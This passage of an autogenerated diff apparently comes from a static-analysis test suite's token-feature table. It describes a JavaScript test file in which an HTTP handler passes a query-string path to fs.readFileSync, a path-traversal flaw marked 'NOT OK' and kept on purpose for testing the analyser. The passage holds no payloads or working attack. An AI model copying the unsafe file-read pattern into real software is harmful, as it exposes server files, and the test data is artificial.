mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | 'arguments' object of function getFsModule | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | 'arguments' object of function getFsModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | 'arguments' object of function getFsModule | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | 'arguments' object of function getFsModule | enclosingFunctionName | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | 'arguments' object of function getFsModule | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | exceptional return of function getFsModule | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | exceptional return of function getFsModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | exceptional return of function getFsModule | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | exceptional return of function getFsModule | enclosingFunctionName | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | exceptional return of function getFsModule | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | functio ... ;\\n }\\n} | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | functio ... ;\\n }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | functio ... ;\\n }\\n} | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | return of function getFsModule | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | return of function getFsModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | return of function getFsModule | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | return of function getFsModule | enclosingFunctionName | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:33:1 | return of function getFsModule | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:27:10:27:20 | getFsModule | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:27:10:27:20 | getFsModule | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:27:10:27:20 | getFsModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:27:10:27:20 | getFsModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:27:10:27:20 | getFsModule | contextSurroundingFunctionParameters | (special) | +| autogenerated/TaintedPath/other-fs-libraries.js:27:10:27:20 | getFsModule | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:27:10:27:20 | getFsModule | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:27:22:27:28 | special | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:27:22:27:28 | special | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:27:22:27:28 | special | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:27:22:27:28 | special | contextSurroundingFunctionParameters | (special) | +| autogenerated/TaintedPath/other-fs-libraries.js:27:22:27:28 | special | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/other-fs-libraries.js:27:22:27:28 | special | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/other-fs-libraries.js:27:22:27:28 | special | enclosingFunctionName | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:27:22:27:28 | special | enclosingFunctionName | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:27:22:27:28 | special | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:27:22:27:28 | special | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:28:7:28:13 | special | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:28:7:28:13 | special | contextSurroundingFunctionParameters | (special) | +| autogenerated/TaintedPath/other-fs-libraries.js:28:7:28:13 | special | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/other-fs-libraries.js:28:7:28:13 | special | enclosingFunctionName | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:28:7:28:13 | special | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:18 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:18 | require | contextSurroundingFunctionParameters | (special) | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:18 | require | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:18 | require | enclosingFunctionName | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:18 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:24 | exceptional return of require("fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:24 | exceptional return of require("fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:24 | exceptional return of require("fs") | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:24 | exceptional return of require("fs") | enclosingFunctionName | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:24 | exceptional return of require("fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:24 | require("fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:24 | require("fs") | contextSurroundingFunctionParameters | (special) | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:24 | require("fs") | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:24 | require("fs") | enclosingFunctionName | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:29:12:29:24 | require("fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:29:20:29:23 | "fs" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:29:20:29:23 | "fs" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:29:20:29:23 | "fs" | calleeImports | | @@ -9929,6 +80658,21 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:29:20:29:23 | "fs" | enclosingFunctionBody | special special require fs require original-fs | | autogenerated/TaintedPath/other-fs-libraries.js:29:20:29:23 | "fs" | enclosingFunctionName | getFsModule | | autogenerated/TaintedPath/other-fs-libraries.js:29:20:29:23 | "fs" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:18 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:18 | require | contextSurroundingFunctionParameters | (special) | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:18 | require | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:18 | require | enclosingFunctionName | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:18 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:33 | exceptional return of require ... al-fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:33 | exceptional return of require ... al-fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:33 | exceptional return of require ... al-fs") | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:33 | exceptional return of require ... al-fs") | enclosingFunctionName | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:33 | exceptional return of require ... al-fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:33 | require ... al-fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:33 | require ... al-fs") | contextSurroundingFunctionParameters | (special) | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:33 | require ... al-fs") | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:33 | require ... al-fs") | enclosingFunctionName | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:31:12:31:33 | require ... al-fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:31:20:31:32 | "original-fs" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:31:20:31:32 | "original-fs" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:31:20:31:32 | "original-fs" | calleeImports | | @@ -9937,12 +80681,81 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:31:20:31:32 | "original-fs" | enclosingFunctionBody | special special require fs require original-fs | | autogenerated/TaintedPath/other-fs-libraries.js:31:20:31:32 | "original-fs" | enclosingFunctionName | getFsModule | | autogenerated/TaintedPath/other-fs-libraries.js:31:20:31:32 | "original-fs" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:35:5:35:8 | util | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:35:5:35:8 | util | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:35:5:35:8 | util | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:35:5:35:8 | util | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:35:5:35:26 | util | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:35:5:35:26 | util | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:35:5:35:26 | util | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:35:5:35:26 | util = ... "util") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:35:5:35:26 | util = ... "util") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:35:5:35:26 | util = ... "util") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:35:12:35:18 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:35:12:35:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:35:12:35:18 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:35:12:35:26 | exceptional return of require("util") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:35:12:35:26 | exceptional return of require("util") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:35:12:35:26 | exceptional return of require("util") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:35:12:35:26 | require("util") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:35:12:35:26 | require("util") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:35:12:35:26 | require("util") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:35:20:35:25 | "util" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:35:20:35:25 | "util" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:35:20:35:25 | "util" | calleeImports | | | autogenerated/TaintedPath/other-fs-libraries.js:35:20:35:25 | "util" | contextFunctionInterfaces | getFsModule(special) | | autogenerated/TaintedPath/other-fs-libraries.js:35:20:35:25 | "util" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/other-fs-libraries.js:35:20:35:25 | "util" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:1:37:4 | http | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:1:37:4 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:37:1:37:4 | http | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:1:37:17 | http.createServer | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:1:37:17 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:37:1:37:17 | http.createServer | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:1:43:2 | exceptional return of http.cr ... T OK\\n}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:1:43:2 | exceptional return of http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:37:1:43:2 | exceptional return of http.cr ... T OK\\n}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:1:43:2 | http.cr ... T OK\\n}) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:1:43:2 | http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:37:1:43:2 | http.cr ... T OK\\n}) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:6:37:17 | createServer | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:6:37:17 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:37:6:37:17 | createServer | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | fs | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | require | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | this | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | this | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | this | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | url | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | util | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | util | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | util | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | util | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:37:18 | util | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | 'arguments' object of anonymous function | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | exceptional return of anonymous function | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | exceptional return of anonymous function | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | functio ... OT OK\\n} | calleeImports | http | @@ -9950,6 +80763,81 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | functio ... OT OK\\n} | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | functio ... OT OK\\n} | receiverName | http | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | return of anonymous function | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:37:19:43:1 | return of anonymous function | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:28:37:30 | req | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:28:37:30 | req | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:28:37:30 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:37:28:37:30 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:28:37:30 | req | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:37:28:37:30 | req | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:37:28:37:30 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:37:28:37:30 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:37:28:37:30 | req | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:28:37:30 | req | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:37:33:37:35 | res | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:33:37:35 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:37:33:37:35 | res | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:37:33:37:35 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:37:33:37:35 | res | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:10 | path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:10 | path | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:10 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:48 | path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:48 | path | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:48 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:48 | path = ... ry.path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:38:7:38:48 | path = ... ry.path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:16 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:16 | url | contextSurroundingFunctionParameters | (req, res) | +| 